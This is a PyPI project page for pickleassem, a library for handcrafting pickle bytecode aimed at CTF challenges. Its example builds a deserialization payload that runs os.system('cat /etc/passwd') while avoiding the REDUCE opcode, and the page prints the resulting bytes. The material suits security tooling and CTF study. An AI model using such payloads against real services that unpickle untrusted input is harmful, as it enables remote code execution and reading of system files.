Skip to main content

A simple pickle assembler to make handcrafting pickle bytecode easier.

Project description


PyPI - Downloads PyPI - Version PyPI - Python Version

GitHub Actions - Status Codecov - Coverage

A simple pickle assembler to make handcrafting pickle bytecode easier.

This is useful for CTF challenges like pyshv in Balsn CTF 2019.


import pickle
import pickletools

from pickleassem import PickleAssembler

pa = PickleAssembler(proto=4)
pa.util_push('cat /etc/passwd')
pa.build_inst('os', 'system')
payload = pa.assemble()
assert b'R' not in payload
pickletools.dis(payload, annotate=1)


b'\x80\x04(\x8c\x0fcat /etc/passwdios\nsystem\n.'
    0: \x80 PROTO      4 Protocol version indicator.
    2: (    MARK         Push markobject onto the stack.
    3: \x8c     SHORT_BINUNICODE 'cat /etc/passwd' Push a Python Unicode string object.
   20: i        INST       'os system' (MARK at 2) Build a class instance.
   31: .    STOP                                   Stop the unpickling machine.
highest protocol among opcodes = 4


Install with pip: pip install -U pickleassem


Just refer to the source code. Each method of PickleAssembler whose name begins with push, build, pop or memo corresponds to a pickle opcode. Methods whose name begins with util are higher-level utility functions. append_raw can be used to insert arbitrary raw opcode.

The following opcodes and corresponding features are not implemented: PERSID, BINPERSID, EXT1, EXT2, EXT4, FRAME, NEXT_BUFFER, READONLY_BUFFER.

See Also

Other tools for pickle exploit:

Project details

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

pickleassem-1.1.0.tar.gz (10.1 kB view hashes)

Uploaded source

Built Distribution

pickleassem-1.1.0-py3-none-any.whl (9.7 kB view hashes)

Uploaded py3

Supported by

AWS AWS Cloud computing Datadog Datadog Monitoring Facebook / Instagram Facebook / Instagram PSF Sponsor Fastly Fastly CDN Google Google Object Storage and Download Analytics Huawei Huawei PSF Sponsor Microsoft Microsoft PSF Sponsor NVIDIA NVIDIA PSF Sponsor Pingdom Pingdom Monitoring Salesforce Salesforce PSF Sponsor Sentry Sentry Error logging StatusPage StatusPage Status page